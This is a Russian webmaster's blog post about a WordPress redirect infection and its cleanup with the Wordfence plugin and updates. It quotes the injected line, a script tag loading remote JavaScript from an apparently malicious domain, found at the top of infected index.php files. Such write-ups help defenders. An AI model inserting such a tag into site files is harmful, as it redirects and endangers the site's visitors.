На мои сайты неоднократно покушались различного рода вирусы и последствия всегда были разными, вплоть до угроз удаления всех моих файлов от хостера. Как заражаются мои сайты я не исследовал (а зря), но причины чаще всего следующие:
- очень долго не обновлялись плагины, темы или сам WordPress движок;
- заразился чужой сайт, размещенный на том же сервере, что и мои;
- случайно загрузил на сайт зараженный файл.
Как заметили мои читатели (удивляюсь, что они еще остались), данный сайт был недоступен примерно с 5-6 мая. Сегодня с утра зашел проверить свой сайт, но вместо привычной страницы загрузилась совсем другая через редирект, на которую активно ругался мой антивирус.
Причины несанкционированного редиректа
Первым делом за решением полез в Гугл. Но, как оказалось, многие вебмастера столкнулись с подобной проблемой в эти дни, ответы на форумах были разными: кто-то советовал снести весь сайт и установить последнюю версию бекапа, а кто-то предлагал свои платные услуги. Я попробовал самостоятельно решить возникшую проблему и начал с анализа папок на сервере с целью выявления причин. Практически все файлы с названием index.php во всех важных директориях имели изменения от 4 мая 2020 года. Т.е. они заразились одновременно в этот день и содержали в себе следующий скрипт:
<script type='text/javascript' src='https://stat. trackstatisticsss. com/k.js?v=222'></script>
Данный скрипт в файлах index.php искать долго не пришлось, зараженными оказались первые строчки.
Вирус пробрался в следующие директории:
- В папки с плагинами;
- В папки с темами;
- Практически все папки директории wp-admin.
Как решал проблему
Руками открывать каждый файл и его чистить проблематично. Погуглив, нашел плагин Wordfence, который помог мне справиться с данной задачей. Но чтобы войти в админку своего сайта, избежав редиректа на сторонний ресурс, я все же почистил файл index.php в директории wp-admin.
Далее я установил плагин Wordfence в админке своего сайта и произвел сканирование всего сайта на наличие подозрительных файлов и скриптов. Плагин с задачей своей справился успешно. Практически все файлы index.php вылечил, нажав на кнопку REPAIR ALL REPAIRABLE FILES, а все подозрительные файлы с пометкой «Critical» удалил кнопкой DELETE ALL DELETABLE FILES.
На финальном этапе, по совету службы поддержки моего хостера, обновил движок WordPress и плагины.
На текущий момент Wordfence не ругается на файлы моего сайта. Проблема решена!
Буду рад, если мой опыт поможет другим вебмастерам.